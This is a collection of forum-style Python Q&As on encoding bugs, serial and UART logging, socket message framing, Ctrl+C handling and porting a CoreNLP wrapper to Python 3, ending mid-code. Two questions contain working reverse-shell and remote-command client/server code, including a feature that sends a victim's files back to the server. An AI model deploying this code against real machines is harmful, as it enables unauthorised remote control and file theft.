converting the python queue module from python2 to python3 - python

I have a logging script that will log serial output from multiple devices in a queue of serial terms into stdout. In python 2.7 the script worked as intended. However upon converting the script to python3. I noticed that after I converted the queue module to its python3 form, my script started printing out empty lines in addition to the regular expected output. Could someone explain what the cause of this is and any best practice to fix this?
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import serial
import sys
import threading
from datetime import datetime
import glob
import time
import os
import termcolor as tc
import queue
__version__ = 2.0
COLOR = True
# Available colors
# blue, yellow, green, cyan,
# magenta, white, red, grey,
# light_grey, on_red
# Add light grey to the colors dictionary
tc.COLORS['light_grey'] = 38
# Add a highlight color
tc.COLORS['on_red'] = 41
TIMEOUT = 0.05 # seconds
DEVS = []
usb_devices = []
speaker_types = ['Tx', 'Rx-FL', 'Rx-FR', 'Rx-Center', 'Rx-Subwoofer']
stamp = time.strftime("%Y:%m:%d-%H:%M:%S")
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
result.reverse()
print("Ports: " + str(result))
pattern = 'USB'
usb_devices = [string for string in result if pattern in string]
return usb_devices
def add_device(position):
name = speaker_types[position]
return name
class SerialTerm(object):
"""A serial terminal that runs in its own thread"""
def __init__(self, name, port, timeout, queue, baudrate=2000000, color=None):
self.name = name
self.port = port
self.timeout = timeout
self.queue = queue
self.baudrate = baudrate
self.color = color
self.receiver_thread = None
self.alive = None
self.serial = serial.serial_for_url(
self.port,
timeout=self.timeout,
baudrate=self.baudrate)
def start(self):
"""Starts the terminal thread"""
self.alive = True
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
#self.reset()
def stop(self):
"""Stops the terminal thread"""
self.alive = False
self.receiver_thread.join()
def reader(self):
"""Reads data from the associated serial port and puts the data in a
queue"""
while self.alive:
now = datetime.utcnow()
line = self.serial.readline()
if line != "":
output_str = f"{now.time().isoformat()[:12]}(UTC) {self.name}> {line}"
if COLOR and (self.color is not None):
output_str = tc.colored(output_str, self.color)
self.queue.put(output_str)
def join(self):
"""Waits until thread terminates"""
self.receiver_thread.join()
def main():
print("Getting Devices")
dev = serial_ports()
position = 0
name = ''
for d in dev:
name = add_device(position)
DEVS.append({'port':dev[position], 'name':name, 'color':'white'})
position += 1
print('DEVS: ' + str(DEVS))
"""Round robin serial polling"""
sys.stdout.write("v{}\n".format(__version__))
sys.stdout.flush()
que = queue.Queue()
terms = []
for dev in DEVS:
terms.append(
SerialTerm(
name=dev['name'],
port=dev['port'],
color=dev['color'],
timeout=TIMEOUT,
queue=que))
for term in terms:
term.start()
try:
while True:
try:
# The queue.get method needs a timeout or KeyboardInterrupt won't ever raise.
sys.stdout.write(que.get(timeout=60) + "\n")
sys.stdout.flush()
except queue.Empty:
pass
except KeyboardInterrupt:
sys.stderr.write("\nQuitting\n")
for term in terms:
term.stop()
term.join()
sys.exit()
sys.stdout.flush()
except:
raise
if __name__ == '__main__':
main()
Here is an example of the bad output python3 has been giving me. It would just spam these empty lines indefinitely in addition to any normal printout that is displayed.
00:53:00.859(UTC) Tx> b''
00:53:00.909(UTC) Tx> b''
00:53:00.960(UTC) Tx> b''
00:53:01.010(UTC) Tx> b''
00:53:01.061(UTC) Tx> b''
00:53:01.111(UTC) Tx> b''
00:53:00.859(UTC) Tx> b'Expected Printout'
00:53:00.909(UTC) Tx> b''
00:53:00.960(UTC) Tx> b''
00:53:01.010(UTC) Tx> b''
00:53:01.061(UTC) Tx> b''
00:53:01.111(UTC) Tx> b''

the bug is here:
line = self.serial.readline()
if line != "":
output_str = f"{now.time().isoformat()[:12]}(UTC) {self.name}> {line}"
if COLOR and (self.color is not None):
output_str = tc.colored(output_str, self.color)
self.queue.put(output_str)
self.serial.readline() returns a bytes object. As a result, it will not compare equal to str objects such as "", so empty lines are no longer filtered out.
To fix it, you will need to convert the return value of self.serial.readline() to str with bytes.decode
See this guide for more details about the changes to strings made in python 3, and how to properly port python 2 code.

Related

Using a class with a uart object in another file

I have a class wifi that communicates with a coprocessor running ESP-AT, and I am trying to use it in another file however the uart .read method returns an unknown character (\xfe or \xff). When I tested the class in its own file it worked as expected.
wifi.py
from machine import UART, Pin
class wifi:
def __init__(self, uartNum=0, baud=115200, tx=Pin(0), rx=Pin(1)):
self._uart = UART(uartNum, baud, tx = tx, rx = rx) #Private uart object
def write(self, command): #Writes a command to the coprocessor
self._uart.write(command+"\r\n")
def awaitResponse(self, timeout=10):
time = 0
while timeout>=time: #Requires response in 10 seconds
if self._uart.any() > 0:
break #Breaks out the loop if any data detected
sleep(1)
time+=1
else:
return "No response" #If loop isn't broken out of no response is found
res = ""
while self._uart.any() > 0:
t = self._uart.read(1024) #Reads data
try:
res+=t.decode() #Decodes and adds the data to the response
except UnicodeError: #If the data cant be decoded
print(t)
res+="?"
return res
def cmd(self, command, timeout=10): #Combines write and awaitResponse
self.write(command)
return self.awaitResponse(timeout).replace("\r\n\r\n", "\r\n")
#This works in the same file
w = wifi()
print(w.cmd("AT")) #Tests connection
other.py
from wifi import wifi
#This doesnt work and returns an unknown character
w = wifi()
print(w.cmd("AT")) #Tests connection

How to handle error while encryption decoding?

I am trying to decode packages that will come from the server reverse shell. Problem is It is not always possible to know the encoding style of the reached system even though utf-8 is massively dominating. So I want to loop through a list to try every possible encoding systems that embedded in python to decode the format.
import socket
import subprocess
import simplejson
import os
import sys
def decoder():
codecs = open("C:\\Users\\burak\\Desktop\\Folders\\FILES\\scripts\\scripts_1\\3.9codecs.txt")
return list(codec.strip()[2:-2] for codec in codecs)
class Client:
def __init__(self, host, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((host, port))
def json_send(self, data):
json_data = simplejson.dumps(data)
self.connection.send(json_data.encode('utf-8'))
def json_recv(self):
json_data = self.connection.recv(2048).decode()
return simplejson.loads(json_data)
def command_execution(self, command):
otpt = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
parse = otpt.communicate()
x = 0
> ***try:
> This PART !
> except Exception as e:
> print(e)***
def change_directory(self, directory):
os.chdir(directory)
return "Cd to " + directory
def start(self):
while True:
command = self.json_recv()
if command[0] == "exit":
self.connection.close()
sys.exit(0)
elif command[0] == "cd" and len(command) > 1:
command_output = self.change_directory(command[1])
else:
command_output = self.command_execution(command)
self.json_send(command_output)
client_one = Client("localhost", 8080)
client_one.start()
In my code you can see, I am extracting a string from a .txt file than converting it into a list, than what I tried is that
try:
for codec in decoder()
return parse[0].decode(codec)
if UnicodeDecodeError or TypeError:
continue
except Exception as e:
print(e)
It is not working as I expected, I think everytime decoder crashes, for loop jumping back to where it starts (in my case 'ascii' as a first element of that list). I could not come up with any solutions, ideas ?

Server/Client app and JSONDecodeError: Unterminated string python

I have async socket server file and client file.
When i send something like that "download filename.ex" to the client, this client's code hande my request:
try:
content = read(sp_data[-1]).decode('utf-8')
print(content)
msg = json.dumps({'file': sp_data[-1], 'command': data, 'content': content,
'msg': f'[+] File {sp_data[-1]} has been successfully downloaded.'}).encode('utf-8')
except FileNotFoundError:
msg = json.dumps({'msg': f'[-] File {sp_data[-1]} not found', 'command': data}).encode('utf-8')
s.send(msg)
When client send some data to the socketserver, this server's code handle received message:
def recv_message(client_socket):
global messages
data = json.loads(client_socket.recv(4096).decode('utf-8').strip()) ##Important here i got this error json.decoder.JSONDecodeError: Unterminated string starting at: line 1 column 67 (char 66)
raddr = get_raddr(str(client_socket))
raddr = f'{raddr[0]}:{raddr[1]}'
message = f'From: {raddr}\nCommand: {data["command"]}\nOutput: \n\n{data["msg"]}'
try:
d = messages[raddr]
d.append(message)
messages[raddr] = d
except KeyError:
messages[raddr] = [message]
except AttributeError:
print(message, messages)
if 'content' in data.keys(): ##Important
print(data['content'])
threading.Thread(target=create_file, args=(data['file'], data['content'],), daemon=False).start()
Error:
data = json.loads(client_socket.recv(4096).decode('utf-8').strip())
json.decoder.JSONDecodeError: Unterminated string starting at: line 1 column 67 (char 66)
But server's code above give me this error when it receive message from the first code(when i send something like that "download file.ex" to the client, client detect my command as its special command, execute the first code, send json file to the server. But if i send "dir" command to the client, it will detect my command like shell command, will run command through subprocess, will send result to the server back and i won't get any errors.)
Note: I also reduced socketserver's code. Therefore, something in my code can work worse. The main goal of this post - make download feature works. I also understand that my code is big. I left "##Important" comments in my files. U can watch only code that located by these comments.
Server:
import selectors
import socket
import threading
import json
import base64
import shlex
selector = selectors.DefaultSelector()
connections = {}
def accept_conn(server_socket):
sock, addr = server_socket.accept()
connections[len(connections) + 1] = [sock, f'{addr[0]}:{addr[-1]}']
selector.register(fileobj=sock, events=selectors.EVENT_READ, data=recv_message)
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('localhost', 4444))
s.listen()
selector.register(fileobj=s, events=selectors.EVENT_READ, data=accept_conn)
messages = {}
##Important
def create_file(file, content): #content - base64 string
print(content)
with open(file, 'wb') as f:
f.write(base64.b64decode(content.encode('utf-8')))
def recv_message(client_socket):
global messages
data = json.loads(client_socket.recv(4096).decode('utf-8').strip()) ##Important here i got this error json.decoder.JSONDecodeError: Unterminated string starting at: line 1 column 67 (char 66)
raddr = get_raddr(str(client_socket))
raddr = f'{raddr[0]}:{raddr[1]}'
message = f'From: {raddr}\nCommand: {data["command"]}\nOutput: \n\n{data["msg"]}'
try:
d = messages[raddr]
d.append(message)
messages[raddr] = d
except KeyError:
messages[raddr] = [message]
except AttributeError:
print(message, messages)
if 'content' in data.keys(): ##Important
print(data['content'])
threading.Thread(target=create_file, args=(data['file'], data['content'],), daemon=False).start()
def get_raddr(string):
'''Get raddr parameter from client socket'''
raddr = string.replace('>', '')
return eval(raddr[raddr.find('raddr')::].replace('raddr=', ''))
def is_manage_string(sub, string):
tokens = shlex.split(string)
try:
if len(tokens) == 2 and tokens[0] == sub and str(int(tokens[-1])):
return True, int(tokens[-1])
except Exception as e:
print(e)
return False
manage_process = False
def manage():
global manage_process
while True:
manage_process = False
command = input('>>> ').strip()
if command == 'list':
try:
for i in range(1, len(connections) + 1):
print(f'{i}\t{connections[i][-1]}')
except KeyError:
pass
if len(connections) == 0:
print('[-] There are not any connections')
elif 'manage' in command:
index = is_manage_string('manage', command)
if index:
index = index[-1]
else:
print('[-] Invalid command\nUse manage "number_of_connection"\nEx: manage 1')
continue
if index >= 1 and index <= len(connections):
sock, addr = connections[index]
print(addr)
print(f'{addr} is used')
while True: ##Important here i launch loop which send data to socket
manage_process = True
command = input('>>> ').strip()
if command == 'messages':
try:
if messages[addr] == list():
print()
continue
except KeyError:
pass
try:
print('\n\n'.join(messages[addr]))
except KeyError:
print()
elif command == 'message':
try:
print(messages[addr][-1])
except:
print()
elif command == 'clear_messages':
try:
if messages[addr]:
messages[addr] = []
except KeyError:
print('[-] There are not any messages for cleaning up')
elif command == 'leave':
print(f'Leaving connection {addr}')
break
elif command: ##Important if command hasn't been detected as my special command(leave, messages), it will be executed like shell command
try:
sock.send(command.encode('utf-8'))
print(
'Your input has not been detected as special command and will execute like shell command or like client special command(ex: download; see client file)')
except ConnectionResetError:
print("Connection has been lost, therefore shell commands can't be used")
else:
continue
else:
print('[-] Invalid number of connection')
elif command:
print('[-] Invalid command\nType "help" to see avalible commands')
##Important
def event_loop():
while True:
data = selector.select()
for key, _ in data:
try:
key.data(key.fileobj)
except ConnectionResetError:
selector.unregister(key.fileobj)
##Important
threading.Thread(target=manage, daemon=True).start()
event_loop()
Client:
import socket
import subprocess
import shlex
import threading
import json
import base64
s = socket.socket()
s.connect(('localhost', 4444))
##Important
def read(file):
with open(file, 'rb') as f:
return base64.b64encode(f.read())
def runner(data):
sp_data = shlex.split(data)
try:
print(sp_data)
if len(sp_data) == 2 and sp_data[0] == 'download': ###Important here we create json object which will be send to socketserver
try:
content = read(sp_data[-1]).decode('utf-8')
print(content)
msg = json.dumps({'file': sp_data[-1], 'command': data, 'content': content,
'msg': f'[+] File {sp_data[-1]} has been successfully downloaded.'}).encode('utf-8')
except FileNotFoundError:
msg = json.dumps({'msg': f'[-] File {sp_data[-1]} not found', 'command': data}).encode('utf-8')
s.send(msg)
return ''
except Exception as e:
print(e)
command = subprocess.run(data, shell=True, encoding='cp866', text=True, capture_output=True)
command = command.stderr if command.stderr else command.stdout
command = json.dumps({'msg': command, 'command': data})
s.send(command.encode('utf-8'))
while True:##Important
data = s.recv(4096).decode('utf-8').strip()
threading.Thread(target=runner, args=(data,)).start()
import socket
import struct
class Socket(socket.socket):
def __init__(self):
self.sock = socket.socket()
super().__init__(socket.AF_INET, socket.SOCK_STREAM)
def send_msg(self, msg):
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + msg
self.sock.sendall(msg)
def recv_msg(self):
# Read message length and unpack it into an integer
raw_msglen = self.recv_all(4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
return self.recv_all(msglen)
def recv_all(self, n):
data = bytearray()
while len(data) < n:
packet = self.sock.recv(n - len(data))
if not packet:
return None
data.extend(packet)
return data
I reshaped ur code into Socket class.
Solution - usage these features:
def send_msg(sock, msg):
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + msg
sock.sendall(msg)
def recv_msg(sock):
# Read message length and unpack it into an integer
raw_msglen = recvall(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
return recvall(sock, msglen)
def recvall(sock, n):
# Helper function to recv n bytes or return None if EOF is hit
data = bytearray()
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data.extend(packet)
return data

Unable to stop the program the first time I press `Ctrl + C`

I have a tcp receiver which is listening for incoming images. I also have a foo() def that runs simultaneously and prints the current time every 5 seconds.
Here is the code:
from __future__ import print_function
import socket
from struct import unpack
import Queue
from PIL import Image
HOST = '10.0.0.1'
PORT = 5005
BUFSIZE = 4096
q = Queue.Queue()
class Receiver:
''' Buffer binary data from socket conn '''
def __init__(self, conn):
self.conn = conn
self.buff = bytearray()
def get(self, size):
''' Get size bytes from the buffer, reading
from conn when necessary
'''
while len(self.buff) < size:
data = self.conn.recv(BUFSIZE)
if not data:
break
self.buff.extend(data)
# Extract the desired bytes
result = self.buff[:size]
# and remove them from the buffer
del self.buff[:size]
return bytes(result)
def save(self, fname):
''' Save the remaining bytes to file fname '''
with open(fname, 'wb') as f:
if self.buff:
f.write(bytes(self.buff))
while True:
data = self.conn.recv(BUFSIZE)
if not data:
break
f.write(data)
import time, threading
def foo():
try:
print(time.ctime())
threading.Timer(5, foo).start()
except KeyboardInterrupt:
print('\nClosing')
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind((HOST, PORT))
except socket.error as err:
print('Bind failed', err)
return
sock.listen(1)
print('Socket now listening at', HOST, PORT)
try:
while True:
conn, addr = sock.accept()
print('Connected with', *addr)
# Create a buffer for this connection
receiver = Receiver(conn)
# Get the length of the file name
name_size = unpack('B', receiver.get(1))[0]
# Get the file name itself
name = receiver.get(name_size).decode()
q.put(name)
print('name', name)
# Save the file
receiver.save(name)
conn.close()
print('saved\n')
# Hit Break / Ctrl-C to exit
except KeyboardInterrupt:
print('\nClosing')
sock.close()
if __name__ == '__main__':
foo()
main()
The problem is that when I press Ctrl + C buttons in order to terminate the program, the first time it prints "closing" but it isn't terminated and I should press these buttons at least two times.
How can I stop the program the first time I press Ctrl + C? I removed try and except in def foo(), but it didn't change the result.
Just reraise the exception after the print statement:
except KeyboardInterrupt:
print('\nClosing')
raise

using corenlp with python3. Stanford_corenlp_pywrapper for python3 gives encoding issues for writing and reading sockets

I am using https://github.com/brendano/stanford_corenlp_pywrapper. It has a sock.py script for communcation which works for python2.
from __future__ import division
import subprocess, tempfile, time, os, logging, re, struct, socket, atexit, glob, itertools
from copy import copy,deepcopy
from pprint import pprint
try:
import ujson as json
except ImportError:
import json
# SUGGESTED: for constituent parsing models, specify shift-reduce parser in
# configdict with:
# 'parse.model': 'edu/stanford/nlp/models/srparser/englishSR.ser.gz'
MODES_items = [
('ssplit', {'annotators': "tokenize, ssplit",
'description': "tokenization and sentence splitting (included in all subsequent ones)", }),
('pos', {'annotators':"tokenize, ssplit, pos, lemma",
'description':"POS (and lemmas)",}),
('ner', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions",
'description':"POS and NER (and lemmas)",}),
('parse', {'annotators':"tokenize, ssplit, pos, lemma, parse",
'description':"fairly basic parsing with POS, lemmas, trees, dependencies",}),
('nerparse', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions, parse",
'description':"parsing with NER, POS, lemmas, depenencies."}),
('coref', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions, parse, dcoref",
'description':"Coreference, including constituent parsing."})
]
MODES = dict(MODES_items)
logging.basicConfig() # wtf, why we have to call this?
LOG = logging.getLogger("CoreNLP_PyWrapper")
LOG.setLevel("INFO")
# LOG.setLevel("DEBUG")
PARSEDOC_TIMEOUT_SEC = 60 * 5
STARTUP_BUSY_WAIT_INTERVAL_SEC = 1.0
def command(mode=None, configfile=None, configdict=None, comm_mode=None,
java_command="java",
java_options="-Xmx4g -XX:ParallelGCThreads=1",
**kwargs):
d = {}
d.update(**locals())
d.update(**kwargs)
more_config = ""
if mode is None and configfile is None and configdict is None:
assert False, "Need to set mode, or the annotators directly, for this wrapper to work."
if mode:
if configdict is not None:
assert 'annotators' not in configdict, "mode was given but annotators are set in the configdict. use only one please."
elif configdict is None:
configdict = {}
LOG.info("mode given as '%s' so setting annotators: %s" % (mode, MODES[mode]['annotators']))
configdict['annotators'] = MODES[mode]['annotators']
if configfile:
more_config += " --configfile {}".format(configfile)
if configdict:
j = json.dumps(configdict)
assert "'" not in j, "can't handle single quote in config values"
more_config += " --configdict '{}'".format(j)
d['more_config'] = more_config
if comm_mode=='SOCKET':
d['comm_info'] = "--server {server_port}".format(**d)
elif comm_mode=='PIPE':
d['comm_info'] = "--outpipe {outpipe}".format(**d)
else: assert False, "need comm_mode to be SOCKET or PIPE but got " + repr(comm_mode)
cmd = """exec {java_command} {java_options} -cp '{classpath}'
corenlp.SocketServer {comm_info} {more_config}"""
return cmd.format(**d).replace("\n", " ")
class SubprocessCrashed(Exception):
pass
class CoreNLP:
def __init__(self, mode=None,
configfile=None, configdict=None,
corenlp_jars=(
"/home/sw/corenlp/stanford-corenlp-full-2015-04-20/*",
"/home/sw/stanford-srparser-2014-10-23-models.jar",
),
comm_mode='PIPE', # SOCKET or PIPE
server_port=12340, outpipe_filename_prefix="/tmp/corenlp_pywrap_pipe",
**more_configdict_args
):
self.mode = mode
self.proc = None
self.server_port = server_port
self.configfile = configfile
self.comm_mode = comm_mode
self.outpipe = None
self.configdict = deepcopy(configdict)
if not self.configdict: self.configdict = {}
self.configdict.update(more_configdict_args)
if not self.configdict: self.configdict = None
if self.comm_mode=='PIPE':
tag = "pypid=%d_time=%s" % (os.getpid(), time.time())
self.outpipe = "%s_%s" % (outpipe_filename_prefix, tag)
assert not os.path.exists(self.outpipe)
assert isinstance(corenlp_jars, (list,tuple))
deglobbed = itertools.chain(*[glob.glob(f) for f in corenlp_jars])
assert any(os.path.exists(f) for f in deglobbed), "CoreNLP jar files don't seem to exist; are the paths correct? Searched files: %s" % repr(deglobbed)
local_libdir = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'lib')
jars = [os.path.join(local_libdir, "*")]
jars += corenlp_jars
self.classpath = ':'.join(jars)
# self.classpath += ":../bin:bin" ## for eclipse java dev
# LOG.info("CLASSPATH: " + self.classpath)
self.start_server()
# This probably is only half-reliable, but worth a shot.
atexit.register(self.cleanup)
def cleanup(self):
self.kill_proc_if_running()
if self.outpipe and os.path.exists(self.outpipe):
os.unlink(self.outpipe)
def __del__(self):
# This is also an unreliable way to ensure the subproc is gone, but
# might as well try
self.cleanup()
def start_server(self):
self.kill_proc_if_running()
if self.comm_mode=='PIPE':
if not os.path.exists(self.outpipe):
os.mkfifo(self.outpipe)
cmd = command(**self.__dict__)
LOG.info("Starting java subprocess, and waiting for signal it's ready, with command: %s" % cmd)
self.proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
time.sleep(STARTUP_BUSY_WAIT_INTERVAL_SEC)
if self.comm_mode=='SOCKET':
sock = self.get_socket(num_retries=100, retry_interval=STARTUP_BUSY_WAIT_INTERVAL_SEC)
sock.close()
elif self.comm_mode=='PIPE':
self.outpipe_fp = open(self.outpipe, 'r')
while True:
# This loop is for if you have timeouts for the socket connection
# The pipe system doesn't have timeouts, so this should run only
# once in that case.
try:
ret = self.send_command_and_parse_result('PING\t""', 2)
if ret is None:
continue
assert ret == "PONG", "Bad return data on startup ping: " + ret
LOG.info("Successful ping. The server has started.")
break
except socket.error, e:
LOG.info("Waiting for startup: ping got exception: %s %s" % (type(e), e))
LOG.info("pausing before retry")
time.sleep(STARTUP_BUSY_WAIT_INTERVAL_SEC)
LOG.info("Subprocess is ready.")
def ensure_proc_is_running(self):
if self.proc is None:
# Has never been started
self.start_server()
elif self.proc.poll() is not None:
# Restart
self.start_server()
def kill_proc_if_running(self):
if self.proc is None:
# it's never been started yet
return
retcode = self.proc.poll()
if retcode is not None:
LOG.info("Subprocess seems to be stopped, exit code %s" % retcode)
elif retcode is None:
LOG.warning("Killing subprocess %s" % self.proc.pid)
os.kill(self.proc.pid, 9)
def parse_doc(self, text, timeout=PARSEDOC_TIMEOUT_SEC, raw=False):
cmd = "PARSEDOC\t%s" % json.dumps(text)
return self.send_command_and_parse_result(cmd, timeout, raw=raw)
def get_socket(self, num_retries=1, retry_interval=1):
# could be smarter here about reusing the same socket?
for trial in range(num_retries):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # not sure if this is needed?
sock.connect(('localhost', self.server_port))
return sock
except (socket.error, socket.timeout) as e:
LOG.info("socket error when making connection (%s)" % e)
if trial < num_retries-1:
LOG.info("pausing before retry")
time.sleep(retry_interval)
assert False, "couldnt connect socket"
def send_command_and_parse_result(self, cmd, timeout, raw=False):
try:
self.ensure_proc_is_running()
data = self.send_command_and_get_string_result(cmd, timeout)
if data is None: return None
decoded = None
if raw:
return data
try:
decoded = json.loads(data)
except ValueError:
LOG.warning("Bad JSON returned from subprocess; returning null.")
LOG.warning("Bad JSON length %d, starts with: %s" % (len(data), repr(data[:1000])))
return None
return decoded
except socket.timeout, e:
LOG.info("Socket timeout happened, returning None: %s %s" % (type(e), e))
return None
# This is tricky. maybe the process is running smoothly but just
# taking longer than we like. if it's in thie state, and we try to
# send another command, what happens? Should we forcibly restart
# the process now just in case?
def send_command_and_get_string_result(self, cmd, timeout):
if self.comm_mode == 'SOCKET':
sock = self.get_socket(num_retries=100)
sock.settimeout(timeout)
sock.sendall(cmd + "\n")
size_info_str = sock.recv(8)
elif self.comm_mode == 'PIPE':
self.proc.stdin.write(cmd + "\n")
self.proc.stdin.flush()
size_info_str = self.outpipe_fp.read(8)
# java "long" is 8 bytes, which python struct calls "long long".
# java default byte ordering is big-endian.
size_info = struct.unpack('>Q', size_info_str)[0]
# print "size expected", size_info
chunks = []
curlen = lambda: sum(len(x) for x in chunks)
while True:
remaining_size = size_info - curlen()
if self.comm_mode == 'SOCKET':
data = sock.recv(remaining_size)
elif self.comm_mode == 'PIPE':
data = self.outpipe_fp.read(remaining_size)
chunks.append(data)
if curlen() >= size_info: break
if len(chunks) > 1000:
LOG.warning("Incomplete value from server")
return None
time.sleep(0.01)
return ''.join(chunks)
def test_modes():
import pytest
gosimple(comm_mode='SOCKET')
gosimple(comm_mode='PIPE')
with pytest.raises(AssertionError):
gosimple(comm_mode=None)
with pytest.raises(AssertionError):
gosimple(comm_mode='asdfasdf')
def test_coref():
assert_no_java("no java when starting")
p = CoreNLP("coref")
ret = p.parse_doc("I saw Fred. He saw me.")
pprint(ret)
assert 'entities' in ret
assert isinstance(ret['entities'], list)
def gosimple(**kwargs):
assert_no_java("no java when starting")
p = CoreNLP("ssplit", **kwargs)
ret = p.parse_doc("Hello world.")
# pprint(ret)
assert len(ret['sentences']) == 1
assert u' '.join(ret['sentences'][0]['tokens']) == u"Hello world ."
p.kill_proc_if_running()
assert_no_java()
def test_paths():
import pytest
with pytest.raises(AssertionError):
CoreNLP("ssplit", corenlp_jars=["/asdfadsf/asdfasdf"])
def assert_no_java(msg=""):
ps_output = os.popen("ps wux").readlines()
javalines = [x for x in ps_output if re.search(r'\bbin/java\b', x)]
print ''.join(javalines)
assert len(javalines) == 0, msg
# def test_doctimeout():
# assert_no_java("no java when starting")
#
# p = CoreNLP("pos")
# ret = p.parse_doc(open("allbrown.txt").read(), 0.5)
# assert ret is None
# p.kill_proc_if_running()
# assert_no_java()
if __name__=='__main__':
import sys
if sys.argv[1]=='modes':
for mode,d in MODES_items:
print " * `%s`: %s" % (mode, d['description'])
if sys.argv[1]=='modes_json':
# import json as stdjson
# print stdjson.dumps(MODES, indent=4)
print '"%s"' % json.dumps(MODES).replace('"', r'\"')
I changed it to python3 using 2to3 script which addded brackets around print and changed exception handling. Updated code
"""
Client and process monitor for the java socket server.
"""
import subprocess, tempfile, time, os, logging, re, struct, socket, atexit, glob, itertools
from copy import copy,deepcopy
from pprint import pprint
try:
import ujson as json
except ImportError:
import json
# SUGGESTED: for constituent parsing models, specify shift-reduce parser in
# configdict with:
# 'parse.model': 'edu/stanford/nlp/models/srparser/englishSR.ser.gz'
MODES_items = [
('ssplit', {'annotators': "tokenize, ssplit",
'description': "tokenization and sentence splitting (included in all subsequent ones)", }),
('pos', {'annotators':"tokenize, ssplit, pos, lemma",
'description':"POS (and lemmas)",}),
('ner', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions",
'description':"POS and NER (and lemmas)",}),
('parse', {'annotators':"tokenize, ssplit, pos, lemma, parse",
'description':"fairly basic parsing with POS, lemmas, trees, dependencies",}),
('nerparse', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions, parse",
'description':"parsing with NER, POS, lemmas, depenencies."}),
('coref', {'annotators':"tokenize, ssplit, pos, lemma, ner, entitymentions, parse, dcoref",
'description':"Coreference, including constituent parsing."})
]
MODES = dict(MODES_items)
logging.basicConfig() # wtf, why we have to call this?
LOG = logging.getLogger("CoreNLP_PyWrapper")
LOG.setLevel("INFO")
# LOG.setLevel("DEBUG")
PARSEDOC_TIMEOUT_SEC = 60 * 5
STARTUP_BUSY_WAIT_INTERVAL_SEC = 1.0
def command(mode=None, configfile=None, configdict=None, comm_mode=None,
java_command="java",
java_options="-Xmx4g -XX:ParallelGCThreads=1",
**kwargs):
d = {}
d.update(**locals())
d.update(**kwargs)
more_config = ""
if mode is None and configfile is None and configdict is None:
assert False, "Need to set mode, or the annotators directly, for this wrapper to work."
if mode:
if configdict is not None:
assert 'annotators' not in configdict, "mode was given but annotators are set in the configdict. use only one please."
elif configdict is None:
configdict = {}
LOG.info("mode given as '%s' so setting annotators: %s" % (mode, MODES[mode]['annotators']))
configdict['annotators'] = MODES[mode]['annotators']
if configfile:
more_config += " --configfile {}".format(configfile)
if configdict:
j = json.dumps(configdict)
assert "'" not in j, "can't handle single quote in config values"
more_config += " --configdict '{}'".format(j)
d['more_config'] = more_config
if comm_mode=='SOCKET':
d['comm_info'] = "--server {server_port}".format(**d)
elif comm_mode=='PIPE':
d['comm_info'] = "--outpipe {outpipe}".format(**d)
else: assert False, "need comm_mode to be SOCKET or PIPE but got " + repr(comm_mode)
cmd = """exec {java_command} {java_options} -cp '{classpath}'
corenlp.SocketServer {comm_info} {more_config}"""
return cmd.format(**d).replace("\n", " ")
class SubprocessCrashed(Exception):
pass
class CoreNLP:
def __init__(self, mode=None,
configfile=None, configdict=None,
corenlp_jars=(
"/home/sw/corenlp/stanford-corenlp-full-2015-04-20/*",
"/home/sw/stanford-srparser-2014-10-23-models.jar",
),
comm_mode='PIPE', # SOCKET or PIPE
server_port=12340, outpipe_filename_prefix="/tmp/corenlp_pywrap_pipe",
**more_configdict_args
):
self.mode = mode
self.proc = None
self.server_port = server_port
self.configfile = configfile
self.comm_mode = comm_mode
self.outpipe = None
self.configdict = deepcopy(configdict)
if not self.configdict: self.configdict = {}
self.configdict.update(more_configdict_args)
if not self.configdict: self.configdict = None
if self.comm_mode=='PIPE':
tag = "pypid=%d_time=%s" % (os.getpid(), time.time())
self.outpipe = "%s_%s" % (outpipe_filename_prefix, tag)
assert not os.path.exists(self.outpipe)
assert isinstance(corenlp_jars, (list,tuple))
deglobbed = itertools.chain(*[glob.glob(f) for f in corenlp_jars])
assert any(os.path.exists(f) for f in deglobbed), "CoreNLP jar files don't seem to exist; are the paths correct? Searched files: %s" % repr(deglobbed)
local_libdir = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'lib')
jars = [os.path.join(local_libdir, "*")]
jars += corenlp_jars
self.classpath = ':'.join(jars)
# self.classpath += ":../bin:bin" ## for eclipse java dev
# LOG.info("CLASSPATH: " + self.classpath)
self.start_server()
# This probably is only half-reliable, but worth a shot.
atexit.register(self.cleanup)
def cleanup(self):
self.kill_proc_if_running()
if self.outpipe and os.path.exists(self.outpipe):
os.unlink(self.outpipe)
def __del__(self):
# This is also an unreliable way to ensure the subproc is gone, but
# might as well try
self.cleanup()
def start_server(self):
